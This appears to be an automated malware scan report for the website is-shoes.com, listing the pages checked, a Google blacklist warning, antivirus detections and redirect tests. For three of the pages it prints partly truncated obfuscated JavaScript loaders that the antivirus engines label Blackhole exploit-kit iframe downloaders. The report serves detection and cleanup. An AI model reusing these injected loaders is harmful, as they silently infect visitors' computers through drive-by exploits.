New scan:

Malware Scanner report for is-shoes.com

Malicious/Suspicious/Total urls checked
3/0/7
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "is-shoes.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=is-shoes.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://is-shoes.com/
200 OK
Content-Length: 9662
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

rkrzn=String;jsnh="spl"+"i"+"t";awg=window;ycoyk=(1)?"0x":"123";titm=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(diw){qixrqx=false;try{}catch(juri){qixrqx=21;}if(1){foqeh="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5fZq69Zq6eZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5fZq
... 4922 bytes are skipped ...
Zq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5fZq69Zq6eZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[jsnh]("Zq");}awg=foqeh;dcfgw=[];for(lqa=22-20-2;-lqa+1403!=0;lqa+=1){ofaaxy=lqa;if((0x19==031))dcfgw+=rkrzn.fromCharCode(eval(ycoyk+awg[1*ofaaxy])+0xa-titm);}bmlhin=eval;if(Math.ceil(5.5)===6)bmlhin(dcfgw)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ad-Aware
Trojan.Script.503932
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
Trojan.Script.503932
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
Trojan.Script.503932 (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Trojan-Downloader.JS.Iframe.dfe
MicroWorld-eScan
Trojan.Script.503932
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
AVG
JS/Exploit
Norman
Quidvetis.A
GData
Trojan.Script.503932
BitDefender
Trojan.Script.503932

http://is-shoes.com/ieupdate.js
200 OK
Content-Length: 11114
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


dfgrux="fr"+"omCh"+"arCo"+"de";if(document.querySelector)ifgu=4;qjs=("31,77,86,7f,74,85,7a,80,7f,31,84,88,41,4a,39,3a,31,8c,1e,1b,31,87,72,83,31,84,85,72,85,7a,74,4e,38,72,7b,72,89,38,4c,1e,1b,31,87,72,83,31,74,80,7f,85,83,80,7d,7d,76,83,4e,38,
... 3734 bytes are skipped ...
,84,7a,85,76,75,70,86,82,38,3a,4e,4e,46,46,3a,8c,8e,76,7d,84,76,8c,64,76,85,54,80,80,7c,7a,76,39,38,87,7a,84,7a,85,76,75,70,86,82,38,3d,31,38,46,46,38,3d,31,38,42,38,3d,31,38,40,38,3a,4c,1e,1b,1e,1b,84,88,41,4a,39,3a,4c,1e,1b,8e,1e,1b,8e".split(","));gklvmu=eval;function rvbzv(){hcj=function(){--(szd.body)}()}szd=document;for(mzvf=0;mzvf<qjs["length"];mzvf+=1){qjs[mzvf]=-(17)+parseInt(qjs[mzvf],ifgu*4);}try{rvbzv()}catch(yjllm){pztam=50-50;}if(!pztam)gklvmu(String[dfgrux].apply(String,qjs));

Antivirus reports:

Avast
JS:Iframe-DNV [Trj]
Ad-Aware
JS:Exploit.BlackHole.NC
Ikarus
Trojan.JS.IFrame
nProtect
JS:Exploit.BlackHole.NC
Emsisoft
JS:Exploit.BlackHole.NC (B)
Comodo
TrojWare.JS.Kryptik.AOH
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Exploit:JS/Blacole.OA
Kaspersky
Trojan.JS.Iframe.afs
MicroWorld-eScan
JS:Exploit.BlackHole.NC
Fortinet
JS/Kryptik.AOH!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chulnr
Norman
Blacole.WQ
GData
JS:Exploit.BlackHole.NC
ESET-NOD32
JS/Kryptik.AOH
BitDefender
JS:Exploit.BlackHole.NC

http://is-shoes.com/site.asp
200 OK
Content-Length: 10752
Content-Type: text/html
clean
http://is-shoes.com/index.htm
200 OK
Content-Length: 9662
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

rkrzn=String;jsnh="spl"+"i"+"t";awg=window;ycoyk=(1)?"0x":"123";titm=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(diw){qixrqx=false;try{}catch(juri){qixrqx=21;}if(1){foqeh="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5fZq69Zq6eZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5fZq
... 4922 bytes are skipped ...
Zq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5fZq69Zq6eZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[jsnh]("Zq");}awg=foqeh;dcfgw=[];for(lqa=22-20-2;-lqa+1403!=0;lqa+=1){ofaaxy=lqa;if((0x19==031))dcfgw+=rkrzn.fromCharCode(eval(ycoyk+awg[1*ofaaxy])+0xa-titm);}bmlhin=eval;if(Math.ceil(5.5)===6)bmlhin(dcfgw)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ad-Aware
Trojan.Script.503932
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
Trojan.Script.503932
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
Trojan.Script.503932 (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Trojan-Downloader.JS.Iframe.dfe
MicroWorld-eScan
Trojan.Script.503932
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
AVG
JS/Exploit
Norman
Quidvetis.A
GData
Trojan.Script.503932
BitDefender
Trojan.Script.503932

http://is-shoes.com/site.asp?idioma=en
200 OK
Content-Length: 10808
Content-Type: text/html
clean
http://is-shoes.com/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://is-shoes.com/site.asp?idioma=it
200 OK
Content-Length: 10814
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: is-shoes.com

Result:
HTTP/1.1 200 OK
Date: Tue, 08 Jul 2014 21:54:43 GMT
ETag: "adb06a97ecc3ce1:5a7e6"
Server: Microsoft-IIS/6.0
Content-Length: 9662
Content-Type: text/html
Last-Modified: Tue, 08 Oct 2013 06:06:56 GMT
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin

...9662 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: is-shoes.com
Referer: http://www.google.com/search?q=is-shoes.com

Result:
The result is similar to the first query. There are no suspicious redirects found.